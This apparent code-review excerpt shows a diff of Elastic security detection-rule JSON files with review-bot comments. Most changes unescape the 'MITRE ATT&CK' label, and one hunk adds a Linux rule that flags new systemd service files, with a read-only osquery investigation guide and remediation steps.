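Review bot: The new-side investigation guide has lost the angle-bracket placeholders the old side carried — the script paths now read `\\Machine\\Scripts\\` and `\\User\\Scripts\\` instead of `<GPOPath>\\Machine\\Scripts\\`, and the XML step now reads "check the `` and `` XML tags" where it previously named `<Command>` and `<Arguments>`. This may be an artifact of how the diff is rendered here, but if the decoded JSON really contains empty backticks then the unescaping dropped `\u003c`/`\u003e` instead of translating them, and the guide is unusable until `<GPOPath>`, `<Command>` and `<Arguments>` are restored. Independently of that, the step `Retrieve the contents of the ScheduledTasks.xml file` belongs to the Scheduled Task via GPO rule listed under Related rules; the artifacts this rule's query keys on are `scripts.ini`/`psscripts.ini` under the GPO's `Machine\Scripts` and `User\Scripts` folders, so the step should direct the analyst to pull those files and review each listed script's command line and parameters for unexpected binaries.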
@@ -71,7 +71,7 @@
 ],
 "risk_score": 47,
 "rule_id": "16fac1a1-21ee-4ca6-b720-458e3855d046",
- "setup": "\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n",
+ "setup": "\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
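Review bot: The rewritten `setup` string keeps two wording defects that this hunk could fix while it is already touching the value: `Steps to implement the logging policy with with Advanced Audit Configuration:` (doubled `with`, in both paragraphs) and `must be configured (Success Failure).`, which disagrees with the `(Success,Failure)` form used inside the fenced blocks that follow. Suggested text: `Steps to implement the logging policy with Advanced Audit Configuration:` and `must be configured (Success,Failure).`.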
diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_102.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_102.json
index fad2c1ca4ca..a8f8a931940 100644
--- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_102.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_103.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_103.json
index 8dba01fddb4..7d23886099c 100644
--- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_103.json
@@ -32,7 +32,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_104.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_104.json
index c4850e6f74d..84c6a46655d 100644
--- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_104.json
@@ -42,7 +42,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_101.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_101.json
index 0a08cd6f62b..2b770e77f8b 100644
--- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_101.json
@@ -32,7 +32,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_102.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_102.json
index 4ee1fee6dc7..e4c3b64e7ed 100644
--- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_102.json
@@ -31,7 +31,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_103.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_103.json
index d710d21e3ad..5c3477274b0 100644
--- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_103.json
@@ -41,7 +41,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_102.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_102.json
index 6c6b9a1877a..3cdb77524fb 100644
--- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_102.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_103.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_103.json
index 1941e7b1895..8ffb8bb0505 100644
--- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_103.json
@@ -32,7 +32,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_104.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_104.json
index 317d1b76ee9..a32e7eb119f 100644
--- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_104.json
@@ -42,7 +42,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_101.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_101.json
index 5c554c0ff87..603c7f162ac 100644
--- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_101.json
@@ -32,7 +32,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_102.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_102.json
index 0042fd44b71..0c491267255 100644
--- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_102.json
@@ -31,7 +31,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_103.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_103.json
index 4f7c6724a4e..3342f193907 100644
--- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_103.json
@@ -41,7 +41,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_101.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_101.json
index 265bf4caada..a2185a06a68 100644
--- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_101.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_102.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_102.json
index 319c0708a65..cc832f03fa4 100644
--- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_102.json
@@ -32,7 +32,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_103.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_103.json
index ec8e549ac57..dddf7ae26d6 100644
--- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_103.json
@@ -42,7 +42,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_1.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_1.json
index 69697e43085..320425b9376 100644
--- a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_1.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_2.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_2.json
index 645e9fe62fc..061e9ca7af0 100644
--- a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_2.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_3.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_3.json
index dd78380b639..96ebeb359ec 100644
--- a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_3.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_4.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_4.json
index 8d477d4b6f1..c4de4e61d09 100644
--- a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_4.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_5.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_5.json
index d7865ad1036..fc647a42349 100644
--- a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_5.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_6.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_6.json
index d01242a39af..c727206bb58 100644
--- a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_6.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_7.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_7.json
new file mode 100644
index 00000000000..81e79945e2e
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_7.json
@@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Systemd service files are configuration files in Linux systems used to define and manage system services. Malicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "New Systemd Service Created by Previously Unknown Process", + "new_terms_fields": [ + "host.id", + "file.path", + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating New Systemd Service Created by Previously Unknown Process\n\nSystemd service files are configuration files in Linux systems used to define and manage system services.\n\nMalicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection.\n\nThis rule monitors the creation of new systemd service files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the systemd service file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd services through the following command `sudo systemctl list-unit-files`.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve 
Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd services for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "host.os.type:linux and event.category:file and event.action:(\"creation\" or \"file_create_event\") and file.path:(\n /etc/systemd/system/* or \n /usr/local/lib/systemd/system/* or \n /lib/systemd/system/* or \n /usr/lib/systemd/system/* or \n /home/*/.config/systemd/user/*\n) and \nnot (\n process.name:(\n \"dpkg\" or \"dockerd\" or \"rpm\" or \"snapd\" or \"yum\" or \"exe\" or \"dnf\" or \"dnf-automatic\" or python* or \"puppetd\" or\n \"elastic-agent\" or \"cinc-client\" or \"chef-client\" or \"pacman\" or \"puppet\" or \"cloudflared\"\n ) or \n file.extension:(\"swp\" or \"swpx\")\n)\n",
+ "references": [
+ "https://opensource.com/article/20/7/systemd-timers",
+ "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.extension",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "17b0a495-4d9f-414c-8ad0-92f018b8e001",
+ "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Privilege Escalation",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": [
+ {
+ "id": "T1543",
+ "name": "Create or Modify System Process",
+ "reference": "https://attack.mitre.org/techniques/T1543/",
+ "subtechnique": [
+ {
+ "id": "T1543.002",
+ "name": "Systemd Service",
+ "reference": "https://attack.mitre.org/techniques/T1543/002/"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1543",
+ "name": "Create or Modify System Process",
+ "reference": "https://attack.mitre.org/techniques/T1543/",
+ "subtechnique": [
+ {
+ "id": "T1543.002",
+ "name": "Systemd Service",
+ "reference": "https://attack.mitre.org/techniques/T1543/002/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "new_terms",
+ "version": 7
+ },
+ "id": "17b0a495-4d9f-414c-8ad0-92f018b8e001_7",
+ "type": "security-rule"
+}
\ No newline at end of file
